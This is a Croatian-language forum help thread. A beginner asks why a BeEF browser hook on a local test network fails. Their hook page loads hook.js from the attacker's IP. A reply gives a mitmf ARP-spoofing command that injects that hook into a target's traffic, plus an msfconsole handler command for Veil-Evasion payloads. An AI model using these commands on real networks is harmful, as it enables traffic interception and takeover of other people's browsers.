Pozdrav ekipa!
Potpuni početnik ovdje pa bih molio za razumijevanje.
U sklopu jednog projekta trebao bih testirati osnovne funkcije BeEF frameworka u sklopu Kali Linux-a.
Plan je bio vršiti testiranja nad računalom (web browserom) spojenim na istu lokalnu mrežu.
Login na BeEF funkcionira regularno i demo testovi također funkcioniraju.
Kako bih izvršio test nad drugim browserom, kreirao sam hook unutar html datoteke pohranjenje na /var/ww/html:
<html>
<head>
<script> src="http://192.168.XXX.XX/hook.js"> </script>
</head>
<body>
You have been hooked
</body>
</html>
...i pokrenuo Apache server naredbom service apache2 start.
Problem nastaje kada na ciljanom (target) pregledniku otvorim hook link (http://192.168.XXX.XX)... ispiše se "You have been hooked", no unutar BeEF sučelja ne pojavljuje se IP adresa hook-anog browsera zbog čega nisam u mogućnosti testirati niti jednu od brojnih naredbi BeEF frameworka.
Bio bih zahvalan ako bi mi netko mogao pomoći.
Sada je: 15 svi 2024, 03:32.
Moderator/ica: Moderatori/ce
2 post(ov)a
• Stranica: 1/1.
Jesi li uopće pokrenuo mitmf ovom naredbom?
Prije toga naravno trebaš pokrenuti aplikaciju i u control panel namjestiti što želiš: http://127.0.0.1:3000/ui/panel
Nakon što "žrtva" pokrene internet browser, log će ti se pojaviti u control panelu. Za listen incoming connections:
U commands tabu možeš pokrenuti razne komande na napadnutom sistemu.
- Kod: Označi sve
mitmf --arp --spoof -i eth0 --gateway 192.168.X.X --targets 192.168.X.X --inject --js-url http://192.168.X.X:3000/hook.js
Prije toga naravno trebaš pokrenuti aplikaciju i u control panel namjestiti što želiš: http://127.0.0.1:3000/ui/panel
Nakon što "žrtva" pokrene internet browser, log će ti se pojaviti u control panelu. Za listen incoming connections:
- Kod: Označi sve
msfconsole -r /var/lib/veil-evasion/output/handlers/evo_handler.rc
U commands tabu možeš pokrenuti razne komande na napadnutom sistemu.
2 post(ov)a
• Stranica: 1/1.
Na mreži
Trenutno korisnika/ca: / i 2 gostiju.